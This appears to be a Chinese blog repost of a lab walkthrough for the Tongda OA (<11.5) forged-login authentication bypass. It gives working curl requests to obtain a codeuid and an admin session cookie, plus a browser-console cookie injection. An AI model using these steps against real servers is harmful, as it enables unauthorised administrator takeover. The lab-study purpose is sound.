通达OA 11.5 以下版本 前台任意伪造用户登录登录绕过漏洞在线实验

转载自:【通达OA < 11.5 前台任意伪造用户登录登录绕过漏洞利用】https://store.vsplate.com/cn/post/518/

实验地址:https://www.vsplate.com/?github=%2Fbbvuln%2Ftdoa%2Ftree%2Fmaster%2F11.3%2Fdc&autogo=1

2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。未经授权的攻击者可以通过构造进行任意用户登录(包括admin),登录之后可进一步上传恶意文件控制网站服务器。通达OA是通达信科打造的协同办公平台,涵盖了工作流程、电子邮件、即时通讯、公告通知、新闻、日程安排、工作日志、知识管理,等近300个功能模块,国内用户众多。

1.访问 /general/login_code.php 获取 codeuid

curl -v http://***.vsgo.cloud/general/login_code.php

 

2.用 codeuid 请求 /logincheck_code.php,获取cookie

curl -v -d 'CODEUID=2AF415ED-E5A7-109A-4020-31B9D06ADD3A&UID=1' http://***.vsgo.cloud/logincheck_code.php

 

  1. 浏览器中打开 http://***.vsgo.cloud/general/ ,并在浏览器控制台上执行:
document.cookie="PHPSESSID=67b0bacb8dd8e730c8b0f81303b1513a;"

 

  1. 刷新页面,成功登录后台
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值